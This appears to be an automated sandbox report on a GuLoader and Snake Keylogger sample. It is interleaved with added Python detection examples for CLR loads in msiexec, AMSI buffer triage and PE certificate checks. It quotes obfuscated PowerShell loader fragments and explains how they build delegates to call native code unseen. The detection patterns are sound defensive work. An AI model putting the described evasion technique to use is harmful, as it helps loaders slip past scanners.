Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
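The load list above shows the 32-bit msiexec.exe pulling in mscoree.dll, vcruntime140_clr0400.dll and ucrtbase_clr0400.dll: a native installer process hosting the .NET runtime, which is what an injected managed payload (the report's Snake Keylogger detection) looks like from the outside. The check below is an added example and not part of the Joe Sandbox report: it groups Sysmon image-load events (Event ID 7) per process and flags CLR modules loaded by images that are not known managed hosts. The event records, process IDs, parent images, full module paths and command lines are constructed to mirror this report; the MANAGED_HOSTS allowlist and the msiexec argument pattern are assumptions to tune per environment.

```python
import re

# Modules whose presence means the .NET runtime is running inside the process.
CLR_MODULES = {
    "mscoree.dll", "mscoreei.dll", "clr.dll", "clrjit.dll", "coreclr.dll",
    "vcruntime140_clr0400.dll", "ucrtbase_clr0400.dll",
}
# Images expected to host the CLR (assumed allowlist; extend per environment).
MANAGED_HOSTS = {
    "powershell.exe", "pwsh.exe", "powershell_ise.exe", "devenv.exe",
    "msbuild.exe", "dotnet.exe", "w3wp.exe",
}
# Script hosts that should not normally spawn a CLR-hosting native binary.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# msiexec.exe legitimately loads the CLR for managed custom actions, but only
# while handling a package, so expect an .msi or an install/uninstall switch.
MSI_ARGS = re.compile(r"\.msi\b|\s/(?:i|x|a|p|fv?|package|uninstall)\b", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def clr_load_findings(events):
    """events: Sysmon EID 7 style dicts. Returns {pid: finding} for native images hosting the CLR."""
    by_pid = {}
    for ev in events:
        rec = by_pid.setdefault(ev["ProcessId"], {
            "image": ev["Image"], "parent": ev["ParentImage"],
            "cmdline": ev["CommandLine"], "clr": set()})
        mod = _basename(ev["ImageLoaded"])
        if mod in CLR_MODULES:
            rec["clr"].add(mod)
    findings = {}
    for pid, rec in by_pid.items():
        name = _basename(rec["image"])
        if not rec["clr"] or name in MANAGED_HOSTS:
            continue
        reasons = ["clr_loaded_in_native_image"]
        if name == "msiexec.exe" and not MSI_ARGS.search(rec["cmdline"]):
            reasons.append("msiexec_without_installer_arguments")
        parent = _basename(rec["parent"])
        if parent in SCRIPT_HOSTS:
            reasons.append("parent_is_" + parent)
        findings[pid] = {
            "image": name, "clr_modules": sorted(rec["clr"]),
            "reasons": reasons, "severity": "high" if len(reasons) > 1 else "low"}
    return findings


def _ev(pid, image, parent, cmdline, loaded):
    return {"ProcessId": pid, "Image": image, "ParentImage": parent,
            "CommandLine": cmdline, "ImageLoaded": loaded}


# Constructed events modelled on the report's process chain (sample -> powershell -> msiexec).
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSI = r"C:\Windows\SysWOW64\msiexec.exe"
SYS32 = r"C:\Windows\System32"
FW32 = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
SAMPLE_EVENTS = [
    _ev(1, SYS32 + r"\svchost.exe", SYS32 + r"\services.exe", "svchost.exe -k netsvcs", SYS32 + r"\srvcli.dll"),
    _ev(2, PS, r"C:\Users\user\Desktop\uPDwUy9ewY.exe", PS, r"C:\Windows\SysWOW64\mscoree.dll"),
    _ev(5, MSI, PS, MSI, r"C:\Windows\SysWOW64\apphelp.dll"),
    _ev(5, MSI, PS, MSI, r"C:\Windows\SysWOW64\mscoree.dll"),
    _ev(5, MSI, PS, MSI, FW32 + r"\vcruntime140_clr0400.dll"),
    _ev(5, MSI, PS, MSI, FW32 + r"\ucrtbase_clr0400.dll"),
    # Benign comparison: a user-launched install with a managed custom action.
    _ev(9, SYS32 + r"\msiexec.exe", r"C:\Windows\explorer.exe",
        r'msiexec.exe /i "C:\Users\user\Downloads\tool.msi"', SYS32 + r"\mscoree.dll"),
]

if __name__ == "__main__":
    for pid, f in clr_load_findings(SAMPLE_EVENTS).items():
        print(pid, f["severity"], f["image"], f["reasons"])
```

The powershell.exe load of mscoree.dll is skipped because PowerShell is a managed host; the user-launched msiexec with an .msi on its command line is reported at low severity so it can be reviewed rather than alerted on.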

Data Obfuscation

Source: Yara match | File source: 00000005.00000002.2126368645.0000000005712000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1284819779.000000000A212000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Spokesperson $Leucoindigotin206 $retsbgernes), (Sjofelist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tillukningen = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dagbladsartikel)), $Computerfolk).DefineDynamicModule($Reavowal, $false).DefineType($Brachering, $Walled, [System.MulticastDelegate])$
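The two AMSI buffers above are the PowerShell stage resolving a native function pointer and wrapping it in a delegate type built at run time (DefineDynamicAssembly, then DefineDynamicModule, then DefineType with a MulticastDelegate base, then Marshal.GetDelegateForFunctionPointer), so unmanaged code can be called without Add-Type and without a C# compile touching disk; the dictionary-word identifiers are the obfuscation the report's GuLoader detection keys on. AMSI hands each buffer to the scanner separately and each half looks harmless on its own, so the useful check correlates buffers per process. The triage below is an added example, not code from the report or from Joe Sandbox: the indicator table and the flagging rule are this example's own assumptions, the first two buffers are quoted from the report (the first is truncated there and stays truncated), and the process labels and remaining buffers are constructed.

```python
import re
from collections import defaultdict

# Indicators of a loader that builds P/Invoke delegates through
# System.Reflection.Emit instead of Add-Type (which would invoke csc.exe).
INDICATORS = {
    "delegate_from_ptr": re.compile(r"GetDelegateForFunctionPointer", re.I),
    "dynamic_assembly": re.compile(r"DefineDynamicAssembly", re.I),
    "dynamic_module": re.compile(r"DefineDynamicModule", re.I),
    "delegate_type": re.compile(r"DefineType\s*\([^)]*MulticastDelegate", re.I | re.S),
    "proc_address": re.compile(r"GetProcAddress|GetModuleHandle|LoadLibrary", re.I),
    # Matches the truncated excerpt in the report as well as the full call.
    "appdomain_assembly_walk": re.compile(r"\[AppDomain\]::CurrentDomain\.GetAsse\w*", re.I),
    "rwx_memory": re.compile(r"VirtualAlloc(?:Ex)?|VirtualProtect|NtProtectVirtualMemory", re.I),
}
EMIT_CHAIN = {"dynamic_assembly", "dynamic_module", "delegate_type"}


def triage_amsi_buffers(events):
    """events: iterable of (process_label, buffer_text) as delivered to AMSI
    or logged as PowerShell script blocks (Event ID 4104).
    Returns {process_label: {"hits": [...], "flagged": bool}}."""
    per_proc = defaultdict(set)
    for proc, text in events:
        hits = per_proc[proc]          # touch so processes with no hits still appear
        for name, rx in INDICATORS.items():
            if rx.search(text):
                hits.add(name)
    result = {}
    for proc, hits in per_proc.items():
        # A delegate wrapped around a raw pointer is only conclusive together with
        # either the Reflection.Emit chain or an explicit export resolution.
        flagged = "delegate_from_ptr" in hits and (EMIT_CHAIN <= hits or "proc_address" in hits)
        result[proc] = {"hits": sorted(hits), "flagged": flagged}
    return result


# Constructed process labels; buffers A1/A2 are quoted from the report above.
SAMPLE_EVENTS = [
    ("powershell.exe#A", "GetDelegateForFunctionPointer((Spokesperson $Leucoindigotin206 $retsbgernes), "
                         "(Sjofelist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))"
                         "$global:Tillukningen = [AppDomain]::CurrentDomain.GetAsse"),
    ("powershell.exe#A", "DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dagbladsartikel)), "
                         "$Computerfolk).DefineDynamicModule($Reavowal, $false)"
                         ".DefineType($Brachering, $Walled, [System.MulticastDelegate])$"),
    # Constructed admin script: P/Invoke via Add-Type, no Reflection.Emit.
    ("powershell.exe#B", "Add-Type -MemberDefinition '[DllImport(\"user32.dll\")] public static extern "
                         "bool LockWorkStation();' -Name U -Namespace W; [W.U]::LockWorkStation()"),
    # Constructed benign script.
    ("powershell.exe#C", "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item"),
]

if __name__ == "__main__":
    for proc, verdict in triage_amsi_buffers(SAMPLE_EVENTS).items():
        print(proc, "FLAGGED" if verdict["flagged"] else "ok", verdict["hits"])
```

Run against the first buffer alone the rule does not fire; it fires once the second buffer from the same process is added, which is the point of aggregating per process rather than scoring each AMSI call in isolation.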
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress | 0_2_00405E92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0451A677 push eax; iretd | 2_2_0451A701
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0451EAF8 push eax; mov dword ptr [esp], edx | 2_2_0451EB0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08D42A51 push es; iretd | 2_2_08D42A52
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE9FE4 push esp; iretd | 5_3_23DE9FE5
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE779A push edi; retf | 5_3_23DE779B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE358C push es; ret | 5_3_23DE35B8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE49A1 push es; ret | 5_3_23DE49C8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE5550 push edi; ret | 5_3_23DE5565
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE5D01 push es; retf | 5_3_23DE5D5B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE72CE push edx; retf | 5_3_23DE7333
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE6C9E push edx; retf | 5_3_23DE6D03
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE5EB0 push edi; ret | 5_3_23DE5EC5
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE5470 push eax; ret | 5_3_23DE5471
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_061E5434 push es; retf | 5_2_061E5448
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_061E3427 pushfd ; retf | 5_2_061E3428
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_061E5449 push es; retf | 5_2_061E544C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_2_061E5A5F push es; ret | 5_2_061E5A70
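The push/ret, push/retf and push/iretd pairs listed for msiexec.exe come from memory dumps of the process (the 5_3 and 5_2 prefixes), that is, from regions the loader wrote into it. A push of a segment register or eax followed directly by a return is not something a compiler emits, so it is either hand-made obfuscation (push target; ret as an indirect jump) or, very often, bytes that are not code at all. The scanner below, an added example rather than the report's or Joe Sandbox's own logic, reproduces the heuristic as a byte-pair match and puts a number on its base rate: 13 one-byte push opcodes times 3 return opcodes gives about one chance hit per 1.7 KiB of uniformly random data, which is why a run of such hits inside a packed or encrypted region is weak evidence on its own. The buffers are constructed and the base address is an arbitrary placeholder.

```python
import random

# One-byte x86 opcodes that the "push X; ret" heuristic pairs up.
PUSH_OPCODES = {0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds", 0x9C: "pushfd"}
PUSH_OPCODES.update({0x50 + i: "push " + r for i, r in
                     enumerate(["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])})
RET_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_push_ret(buf, base=0):
    """Return [(address, mnemonic)] for every push opcode byte immediately followed
    by a return opcode byte. This is a raw byte-pair scan with no disassembly, so it
    ignores instruction boundaries; that is exactly the weakness being measured."""
    hits = []
    for i in range(len(buf) - 1):
        p, r = buf[i], buf[i + 1]
        if p in PUSH_OPCODES and r in RET_OPCODES:
            hits.append((base + i, PUSH_OPCODES[p] + "; " + RET_OPCODES[r]))
    return hits


def expected_random_hits(n_bytes):
    """Expected number of pairs in n_bytes of uniformly random data."""
    return (n_bytes - 1) * len(PUSH_OPCODES) * len(RET_OPCODES) / 65536


def random_buffer(n, seed=1):
    """Deterministic pseudo-random bytes standing in for an encrypted payload region."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed buffers. CODE_LIKE: a prologue (push ebp; mov ebp, esp), then a
# deliberate push edi; ret, padding, then push es; retf.
CODE_LIKE = bytes([0x55, 0x8B, 0xEC, 0x57, 0xC3]) + bytes(8) + bytes([0x06, 0xCB])
# A pure-text false positive: UTF-8 "WÃ" is 0x57 0xC3 0x83 = push edi; ret.
TEXT_FP = "W\u00c3".encode("utf-8")

if __name__ == "__main__":
    print(find_push_ret(CODE_LIKE))
    print(find_push_ret(TEXT_FP, base=0x23DE0000))
    rnd = random_buffer(65536)
    print(len(find_push_ret(rnd)), "hits in 64 KiB of random data, expected about",
          round(expected_random_hits(len(rnd)), 1))
```

Hit density is the useful number: a handful of pairs spread across a 64 KiB dump is consistent with noise, whereas several pairs within a few hundred bytes of a region that also resolves APIs and allocates executable memory is worth a look in a disassembler.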

Persistence and Installation Behavior

Source: Initial sample | Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Organization 'Scoliid' is not a known legitimate company. 3) Email domain 'Ezekiel.Di' is highly suspicious and not a legitimate business domain. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible certificate manipulation. 5) Location inconsistency: Petersburg and New York State combination is unusual. 6) Organization unit name 'Servitor Schenkels' appears randomly generated or meaningless. 7) The email 'Nonprophetic@Ezekiel.Di' uses unusual terms and a suspicious TLD (.Di) that's not commonly used for legitimate business. These characteristics strongly indicate this is likely a malicious certificate created to masquerade as legitimate software.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File created: C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll
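The AI assessment above rests on fields anyone can pull from the sample: the COFF TimeDateStamp in the PE header and the subject, issuer and validity period of the Authenticode signer certificate. Two of its points are mechanical checks worth automating: issuer equal to subject (self-signed, so it never chains to a trusted root) and a certificate that post-dates the compile stamp by years. The example below is added here and is not part of the Joe Sandbox report: it reads the timestamp with the standard library from a constructed, header-only PE image and evaluates it against certificate fields passed in as a dict; extracting those fields from the real PKCS#7 blob is left to a library such as pefile or signify and is not shown. The certificate dates, the DN layout and the two-year threshold are assumptions, and the dates only reflect the report's "2013" and "2024". One caveat the assessment does not state: the dropped nsExec.dll under an nsXXXX.tmp directory is the NSIS installer's plug-in layout, so the 2013 stamp most likely belongs to the NSIS stub rather than to the attacker's own build, and deterministic .NET builds write a hash-derived value into the same field, so treat the gap as corroboration rather than proof.

```python
import struct
from datetime import datetime, timezone


def read_pe_timestamp(pe):
    """COFF TimeDateStamp of a PE image as an aware UTC datetime."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    ts = struct.unpack_from("<I", pe, e_lfanew + 8)[0]
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def build_minimal_pe(stamp):
    """Constructed header-only image: enough for read_pe_timestamp, not loadable."""
    hdr = bytearray(0x40 + 24)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                    # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHI", hdr, 0x44, 0x014C, 3, int(stamp.timestamp()))  # i386, 3 sections, stamp
    return bytes(hdr)


def assess_signature(pe, cert, max_gap_years=2.0):
    """cert: {'subject', 'issuer', 'not_before', 'not_after'} from the Authenticode signer cert."""
    build = read_pe_timestamp(pe)
    gap_years = (cert["not_before"] - build).days / 365.25
    f = {
        "build_stamp": build.isoformat(),
        "self_signed": cert["issuer"] == cert["subject"],
        "cert_postdates_build_years": round(gap_years, 1),
        "stale_build_vs_cert": gap_years > max_gap_years,
        "built_after_cert_expiry": build > cert["not_after"],
        "stamp_in_future": build > datetime.now(timezone.utc),  # forged or hash-derived stamp
    }
    f["suspicious"] = any(f[k] for k in (
        "self_signed", "stale_build_vs_cert", "built_after_cert_expiry", "stamp_in_future"))
    return f


# Constructed inputs. The DN uses only the fields the report names; the exact
# dates are assumptions chosen to match the report's 2013 / 2024 statement.
SELF_SIGNED_DN = "O=Scoliid, OU=Servitor Schenkels, E=Nonprophetic@Ezekiel.Di"
SAMPLE_CERT = {"subject": SELF_SIGNED_DN, "issuer": SELF_SIGNED_DN,
               "not_before": datetime(2024, 1, 15, tzinfo=timezone.utc),
               "not_after": datetime(2025, 1, 15, tzinfo=timezone.utc)}
# Benign comparison: CA-issued certificate valid around the build date.
CA_ISSUED_CERT = {"subject": "O=Example Corp", "issuer": "CN=Example Code Signing CA",
                  "not_before": datetime(2013, 3, 1, tzinfo=timezone.utc),
                  "not_after": datetime(2016, 3, 1, tzinfo=timezone.utc)}
SAMPLE_PE = build_minimal_pe(datetime(2013, 6, 1, tzinfo=timezone.utc))

if __name__ == "__main__":
    print(assess_signature(SAMPLE_PE, SAMPLE_CERT))
    print(assess_signature(SAMPLE_PE, CA_ISSUED_CERT))
```

On a real sample replace build_minimal_pe with the file bytes and fill the cert dict from the signer certificate in the security directory; the checks themselves do not change.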

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (128 identical entries)
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX (25 identical entries)
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 5_3_23DE6B29 sldt word ptr [eax]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: 50 observations, delay time as reported, in order of occurrence: 600000, 599891, 599781, 599672, 599563, 599453, 599344, 599235, 599110, 598985, 598848, 598733, 598625, 598516, 598406, 598297, 598188, 598078, 597969, 597844, 597735, 597610, 597485, 597360, 597235, 597110, 596985, 596860, 596735, 596610, 596485, 596360, 596215, 596108, 596000, 595891, 595766, 595641, 595531, 595422, 595295, 595188, 595078, 594969, 594859, 594750, 594641, 594531, 594422, 594312
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5962
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3785
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6584 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5496 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452 | Thread sleep count: 31 > 30
